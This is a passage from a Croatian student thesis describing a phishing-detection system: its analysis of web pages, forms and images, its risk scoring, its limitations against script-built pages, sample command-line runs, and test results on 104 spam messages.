postoji mogućnost otkrivanja takve greške te bi to kao posljedicu moglo imati svrstavanje
zlonamjerne poruke među sigurne. Zbog toga se otvara svaka adresa do koje se dođe u poruci
te se oni odgovori koji i dalje ostanu na sigurnoj domeni, a ne preusmjere na neku drugu,
odbacuju. Takav rad usporava detekciju, ali istovremeno pruža veću razinu sigurnosti.
6.3 Stranice
Analiziraju se samo stranice u HTML obliku. Glavni elementi koji se traže na stranici su
obrasci za unos podataka i poveznice. Obrazac za unos podataka je temeljni element phishing
napada i on mora biti prisutan u nekom obliku. Bez obrasca nema napada. Međutim, obrazac
se ne mora nalaziti na početnoj stranici i u teoriji ne mora biti izrađen u HTML-u. U drugom
slučaju sustav neće pronaći obrazac i stranica će biti proglašena sigurnom. Prvi slučaj se
rješava na način da se prate poveznice na stranici do zadane dubine i svaka nova stranica se
analizira kao i početna.
Ulazni HTML dokument se pretvara u XML stablo koje se zatim analizira te se izdvajaju sve
poveznice, slike, obrasci i čisti tekst. Čisti tekst se pretražuje za ključne riječi vezane uz
zaštićenu stranicu, ali rezultati pretrage nemaju bitnu ulogu u formiranju rezultata zbog
jezičnih specifičnosti i nemogućnosti određivanja konteksta. Zbog različitih oblika riječi u
raznim jezicima, ključnu riječ često nije moguće pronaći u izvornom obliku. Drugi razlog
nepronalaska može biti skrivanje ključnih riječi u slikama. Sve pronađene poveznice se
svrstavaju u dvije kategorije - one koje vode na štićenu stranicu i one koje ne vode. Samo
postojanje poveznica u prvoj kategoriji povećava vjerojatnost da se radi o napadu. Poveznice
iz druge kategorije su u praksi dosta rijetke. Napadačka stranica se sastoji samo od nekoliko
HTML dokumenata koji su nužni. Sve poveznice koje se nalaze na stranici zato da bi imitirale
izgled štićene stranice obično vode na samu štićenu stranicu. Sve pronađene slike se predaju
modulu za analizu slika koji provjerava njihovo porijeklo te eventualno uspoređuje sadržaj sa
slikama u bazi. Pronađeni obrasci se predaju modulu za analizu obrazaca.
Analiza HTML stabla stranice i usporedba sa štićenom stranicom nije dala upotrebljive
rezultate. Iako dio napadača koristi dijelove HTML-a sa štićenih stranica, ti dijelovi su često
promijenjeni da bi zadovoljili specifične potrebe napada i ne moraju biti preuzeti s najnovije
34
inačice štićene stranice, već mogu biti uzeti s neke od starijih inačica. Iz ovog razloga, a i zato
jer je u HTML-u na mnogo načina moguće postići isti vizualni rezultat, HTML stabla se
mogu drastično razlikovati i bilo kakva usporedba na toj razini ne daje rezultate.
6.4 Obrasci za unos podataka
Obrasci su središnji dio phishing napada. Sve ostalo postoji samo zato da bi žrtvu navelo da
dođe do obrasca i ispuni ga potrebnim podacima. Program izdvaja sva polja na obrascu i
provjerava podudaraju li se polja sa onima na izvornoj štićenoj stranici. Ukoliko se
podudaraju, to povećava sumnju u napad, a nepodudaranje ne znači ništa. Jedna specifičnost
obrazaca za unos podataka na phishing stranicama je to da se prihvaćaju bilo koji uneseni
podaci. Napadač nema mogućnosti provjeriti ispravnost korisničkih imena i lozinki te se bilo
koji unos prihvaća. Zbog toga će sustav pokušati otvoriti stranicu na koju obrazac vodi
koristeći slučajne vrijednosti kao vrijednosti polja. Budući da je vjerojatnost pogotka stvarnih
podataka na taj način praktički beznačajna, ako sumnjivi poslužitelj prihvati unesene podatke,
radi se o stranici koja je predviđena za napad. Poslužitelj može nakon prihvaćanja podataka
vratiti novu stranicu koja će opet biti analizirana ili preusmjeriti korisnika na stvarnu štićenu
stranicu. Ako je korisnik preusmjeren na štićenu stranicu, onda se gotovo sigurno radi o
napadu.
Dobar dio phishing stranica ima samo jedan obrazac - onaj za unos korisničkog imena i
lozinke, što je i dovoljno za većinu primjena poput društvenih mreža ili internetskih igara.
Kod bankarskih prijevara se često pojavljuju veći obrasci gdje se traži velika količina osobnih
podataka, od datuma i mjesta rođenja do imena i adrese roditelja. Svi obrasci na koje sustav
naiđe će biti ispunjeni slučajnim brojevima i poslani. Na taj način se prolazi kroz cijelu
strukturu napadačke stranice na isti način na koji bi prošla i potencijalna žrtva te se u tom
prolazu skupljaju sve informacije koje mogu biti korisne za konačnu odluku.
6.5 Grafički elementi
Napadačka poruka i stranice moraju zadržavati vizualni identitet organizacije za koju se
predstavljaju. Zato se koriste originalni logotipovi i boje na stranicama namijenjenim za
prijevaru. Otkrivanje vizualne sličnosti grafičkih elemenata na dvije stranice je vrlo složen
problem. Ovaj sustav će napraviti samo jednostavne provjere. Prije svega, provjerit će
učitavaju li se grafički elementi sa štićene stranice. Ako je to točno, vrlo vjerojatno se radi o
prijevari. Ako se grafički element ne učitava sa štićene stranice postoji mogućnost vrlo
jednostavne vizualne provjere. Oba elementa, štićeni i sumnjivi, skaliraju se na jednake
dimenzije uz izbacivanje praznog prostora te se provjerava postotak podudarnosti intenziteta
boje na istim koordinatama. To je vrlo spor i nedjelotvoran postupak i zbog toga je ostavljen
kao izborni.
6.6 Konačna ocjena
Sustav može u krajnjim slučajevima zaključiti da se sigurno radi ili ne radi o napadu, a
ukoliko ne postoje dovoljni dokazi ni za jednu od te dvije tvrdnje, proglašava se niska, srednja
ili visoka vjerojatnost napada. Ključni element odluke je obrazac za unos podataka. Ako je
pronađen i ako u konačnici vodi na imitiranu (zaštićenu) stranicu, onda se sigurno radi o
napadu. Ako ne vodi na imitiranu stranicu, a prihvaća bilo koji mogući unos i postoje drugi
35
dokazi, bilo u poruci, bilo na stranici, da se pokušava imitirati zaštićenu stranicu, onda se isto
tako radi o napadu. Postoji mogućnost da stranica više nije aktivna, bilo da se ne odaziva ili
da je postavljen sadržaj koji nema veze s napadom. U oba slučaja će razina rizika ovisiti o
informacijama dostupnim u poruci. Ovaj sustav ne može prepoznati drugi slučaj te će on biti
tretiran jednako kao i potencijalno opasna stranica.
Sustav ocjenjivanja se temelji na pravilu da dokaz potvrđuje sumnju, ali nedostatak dokaza ne
oslobađa. Razlog tome je činjenica da privremena nedostupnost legitimne stranice generalno
čini manju štetu nego uspješna izvedba napada.
6.7 Slabosti sustava
Najveći nedostatak sustava je podrška za isključivo statički HTML sadržaj. To ne predstavlja
velik problem prilikom analize poruka budući da je većina čitača elektroničke pošte upravo
zbog sigurnosti podešena tako da ne izvodi nikakve skripte koje se nalaze u porukama.
Međutim, to ne vrijedi za stranice. Stranice često sadrže skripte. Odnosno, sama
funkcionalnost stranice ovisi o skriptama. U trenutku izrade ovog programa veliku većinu
phishing stranica čine jednostavni HTML dokumenti koji samo vizualno pokušavaju imitirati
izgled stvarnih stranica. Kroz vrijeme, kako napadi postaju sve sofisticiraniji, počet će se sve
intenzivnije koristiti i skripte u HTML dokumentima. JavaScript skripte su vrlo moćne unutar
HTML dokumenata i mogu dinamički izgraditi praktički cijeli dokument tako da početni
dokument koji se učita sadrži samo jednu poveznicu na skriptu. Takva stranica će biti
obilježena kao sigurna od strane sustava za detekciju budući da ne sadrži ni jedan mogući
kompromitirajući element - nema daljnih poveznica, nema obrazaca za unos podataka, nema
čak ni logotipova koji bi se eventualno mogli provjeriti. Skripte koje se nalaze na stranici bi u
ovakvom scenariju bilo nužno izvršiti i provesti analizu nad rezultatom. Ovdje se pojavljuje
još nekoliko problema. Jedan od njih su skripte poput Adobe Flasha koje ne rezultiraju
HTML-om. Rezultat izvođenja takvih skripti je izolirani vizualni element koji ima svu
funkcionalnost kao i ostatak stranice, ali ponaša se kao samostalna aplikacija i na ovaj način
nije moguće analizirati njegovu svrhu. Drugi mogući problem je detekcija organizacije na
koju napad cilja. Bez te informacije nije moguće dokazati napad. Jedini sumnjivi element koji
u tom slučaju ostaje je obrazac koji prima bilo koje vrijednosti za svoja potencijalno
univerzalna polja poput korisničkog imena i lozinke. No takav obrazac se zbog potencijalne
greške poslužitelja ili programera može pojaviti bilo gdje. Vizualno, moraju postojati
elementi koji žrtvu uvjeravaju u namjenu stranice. No, ti elementi koji žrtvi daju dojam da se
nalazi na legitimnoj stranici ne moraju nužno biti sadržani tamo gdje ih ovaj sustav traži,
poput ključnih riječi u tekstu, ključnih riječi u opisima polja za unos podataka, sumnjivo
konstruirane adrese, ili pak poveznica koje vode na originalnu stranicu. Izravne poveznice na
izvornu stranicu ne moraju postojati. Ako se baš želi dobiti pristup toj izvornoj stranici, to je
moguće postići pomoću tzv. proxy skripte na vlastitom poslužitelju koja onda dohvaća
podatke s izvornog poslužitelja. Sva imena i logotipovi mogu biti prikazana pomoću slika.
Spretniji napadač može izrezati te slike tako da ni napredni algoritmi ne mogu otkriti koji dio
pripada kojem logotipu, a skripta na stranici će ih sastaviti tako da čine logičnu cjelinu. Iz
svih ovih razloga statična analiza sadržaja stranice nije dovoljna, čak ni nakon izvršenja
skripti. Jedina čvrsta točka dovoljno dobra za analizu identiteta stranice je konačni rezultat
učitavanja stranice u prozoru preglednika. To znači da se tek nad konačnim rezultatom
iscrtavanja sadržaja stranice mogu pokrenuti algoritmi za traženje sličnosti u slikama i na taj
način pronaći eventualni logotipovi i imena. Ako se radi o HTML-u onda se obrasci i
36
poveznice mogu naći analizom izvornog koda, ali ako se radi o proizvoljnim nezavisnim
skriptama koje se pokreću unutar preglednika, onda se ovaj pristup, pojačan mogućnošću
interakcije s aplikacijom, mora upotrijebiti za dobivanje bilo kakvih informacija o stranici.
Ovo je pristup koji izlazi iz granica ovog rada te njegovi detalji neće biti razmatrani.
6.8 Primjeri uporabe
Sustav se pokreće iz komandne linije, a kao parametar se može zadati putanja do datoteke
koju je potrebno provjeriti ili do direktorija koji sadrži veći broj datoteka. Ukoliko se zadaje
direktorij, sve datoteke koje nisu skrivene (odnosno ime ne počinje točkom) će biti
analizirane. Očekuje se da svaka datoteka bude u RFC 5322 formatu. U suprotnom će analiza
rezultirati greškom.
$ python ./main.py ~/test_data/assorted/paypal-spam-94
Poruka: paypal-spam-94
https://www.paypal.com: poznato
http://localhost/~drago/paypal.com/verify.html: napad
Stranica: http://www.paypalobjects.com/en_US/i/logo/verisign.gif: sumnjivo
URL http://localhost/step2.php rezultat: sumnjivo
FORM http://localhost/step2.php rezultat: sumnjivo
URL http://localhost/~drago/paypal.com/verify.html rezultat: napad
-Konacni rezultat: napad
$
Slika 6.1: Analiza napadačke poruke
Na slici 6.1. možemo vidjeti tijek analize jedne sumnjive poruke. Poruka je namjerno
izmijenjena tako da sve poveznice sadrže adrese koje se nalaze na lokalnom računalu. Razlog
tome je kratak životni vijek napadačkih stranica. Stranica koja se koristi u ovom primjeru je u
cijelosti kopija napadačke stranice. Jedina izmjena u poruci su adrese. Analiza kreće
učitavanjem poruke i izdvajanjem adresa. Prvi trag da se radi o napadu je činjenica da se u
poruci istovremeno nalaze adrese koje vode na štićenu stranicu i one koje ne vode. Dodatno,
adresa koja ne vodi na štićenu stranicu, u sebi sadrži ime štićene stranice i to je vrlo pouzdan
znak napada. Osim toga, stranica na koju vodi poveznica iz poruke sadrži obrasce za unos
podataka te je konačna odluka da se radi o napadu. Na slici 6.2. je prikazana analiza poruke
koja sadrži elemente koji bi mogli uzrokovati sumnju, ali nema dokaza o stvarnom napadu.
python ./main.py ~/test_data/assorted/spam-45
Poruka: spam-45
http://andhnxwgjrh.blogspot.com: URL http://andhnxwgjrh.blogspot.com rezultat: sumnjivo
-Konacni rezultat: sumnjivo
$
Slika 6.2: Analiza sumnjive poruke
37
6.9 Testiranje sustava
Testiranje je provedeno pomoću 104 poruke elektroničke pošte od kojih je 8 poruka
napadačkih za Banca di Roma, 8 za HSBC, 28 za PayPal, a ostalih 60 su obične poruke
neželjene pošte. Zbog kratkog životnog vijeka napadačkih stranica, poruke su pomoću proxy
poslužitelja uparene s lokalno pohranjenim stranicama. Na taj način su vrlo vjerno
reproducirani stvarni uvjeti.
Opasnim porukama je proglašeno 7 Banca di Roma poruka, 5 HSBC poruka i 24 PayPal
poruke. Sve ostale poruke su proglašene sumnjivima. To među napadačkim porukama daje
82% točno svrstanih i 18% svrstanih u sumnjive iako su u stvarnosti napadačke. Sve obične
poruke su svrstane kao sumnjive. Ovo ukazuje na nekoliko nedostataka sustava. Najprije,
svaki sumnjivi element podiže razinu sumnje i zbog toga je jako teško dobiti odgovor da je
poruka sigurna. Drugi nedostatak, koji je i lakše ispraviti, je činjenica da sustav kao rezultat
daje jedan od sljedeća tri odgovora: “sigurno”, “sumnjivo” i ”napad”. Na većini običnih
poruka je bilo puno manje elemenata koji bi ukazivali na napad nego na napadačkim
stranicama i zbog toga bi stupnjevanje odgovora “sumnjivo” dalo puno kvalitetniji rezultat.
38
7. Zaključak
Phishing napadi su tehnički vrlo jednostavni za izvesti. Sve što je potrebno učiniti je postaviti
lažnu internetsku stranicu, sastaviti poruku koja će navesti žrtve da posjete stranicu i zakupiti
prostor u sustavu za distribuciju neželjene pošte. Zbog toga njihov broj stalno raste. Za razliku
od banaka koje ne ulažu u edukaciju svojih klijenata, velike softverske kompanije su otkrile
poslovni potencijal u zaštiti korisnika svog softvera i zahvaljujući tome korisnici
najpopularnijih Internet preglednika imaju temeljnu zaštitu. Ta se zaštita obično temelji na
komercijalnim i zatvorenim sustavima.
U ovom radu je izrađen jedan jednostavan primjer sustava za zaštitu od phishing napada.
Pokazalo se da se radi o vrlo složenom problemu i da su potrebni napredni algoritmi poput
prepoznavanja sadržaja teksta i slika kako bi se napad mogao pouzdano potvrditi. Phishing
poruke su vrlo rijetke među generalnom neželjenom poštom te je potrebno skupiti jako velike
količine neželjene pošte da bi se mogla izdvojiti dovoljna količina adresa phishing stranica za
pružanje usluge provjere adrese u pregledniku. Zbog toga pregledavanje neželjene pošte ima
smisla samo u sustavima s jako velikom količinom poruka. U suprotnom se mogu kontrolirati
pojedinačne poruke prije nego dođu do krajnjeg korisnika.
39
8. Literatura
[1] APWG mjesečni izvještaji, http://www.antiphishing.org/phishReportsArchive.html
[2] PhishTank mjesečni izvještaji, http://www.phishtank.com/stats.php
[3] R. Anderson, Closing the Phishing Hole – Fraud, Risk and Nonbanks,
https://www.kansascityfed.org/Publicat/PSR/Proceedings/2007/pdf/Anderson.pdf
[4] D. Birk, M. Dornseif, S. Gajek, F. Grobert, Phishing Phishers—Tracing Identity Thieves
and Money Launderer,
http://groebert.org/felix/pub/papers/TR_BiGaGr06Phoneypot_2.pdf
[5] J. Milletary, Technical Trends in Phishing Attacks,
http://www.cert.org/archive/pdf/Phishing_trends.pdf
[6] C. E. Drake, J. J. Oliver, E. J. Koontz, Anatomy of a Phishing Email,
http://research.microsoft.com/users/joshuago/conference/papers-2004/114.pdf
[7] T. Holz, M. Steiner, F. Dahl, E. Biersack, F. Freiling, Measurements and Mitigation of
Peer-to-Peer-based Botnets: A Case Study on StormWorm,
http://www.usenix.org/event/leet08/tech/full_papers/holz/holz.pdf
[8] M. Jakobsson, The Human Factor in Phishing,
http://www.informatics.indiana.edu/markus/papers/aci.pdf
[9] M. Wu, R. C. Miller, Why Anti-Phishing Security Toolbars Do Not Work,
http://www.rsa.com/rsalabs/cryptobytes/CryptoBytes-Winter07.pdf
[10] S. Doshi, N. Provos, M. Chew, A Framework for Detection and Measurement of
Phishing Attacks, http://www.cs.jhu.edu/~sdoshi/index_files/phish_measurement.pdf
[11] PhishTank Blog, http://www.phishtank.com/blog/2006/10/17/xml-data-file-of-onlinevalid-phishes-from-phishtank/
[12] Mozilla Firefox Phishing Protection Design Documentation,
https://wiki.mozilla.org/Phishing_Protection:_Design_Documentation
[13] W3Schools Browser statistics,
http://www.w3schools.com/browsers/browsers_stats.asp
[14] Y. Zhang, S. Egelman, L. Cranor, J. Hong, Phinding Phish: Evaluating Anti-Phishing
Tools, http://lorrie.cranor.org/pubs/ndss-phish-tools-final.pdf
[15] Google Goofs On Firefox's Anti-Phishing List,
http://tech.slashdot.org/article.pl?sid=08/09/21/1827209
[16] R. Dhamija, J. D. Tygar, M. Hearst, Why Phishing Works,
http://people.seas.harvard.edu/~rachna/papers/why_phishing_works.pdf
40
Sažetak
U sklopu ovog rada analizirano je kakve prijetnje postoje vezane uz krađu identiteta na
Internetu, kako se ta krađa provodi i koji su ciljevi, te je izrađen sustav koji spriječava krađu.
Sustav se temelji na skupljanju i analizi poruka neželjene pošte, te izdvajanju i dodatnoj
analizi potencijalno opasnih poruka i ciljanih internetskih stranica.
Abstract
In this thesis online identity theft is explored with its risk and vulnerabilities. Technical
details and goals are exposed and a protection system is developed. Protection system is based
on spam analysis, phishing message isolation from other unsolicited mail and further message
and target Web page analysis.
41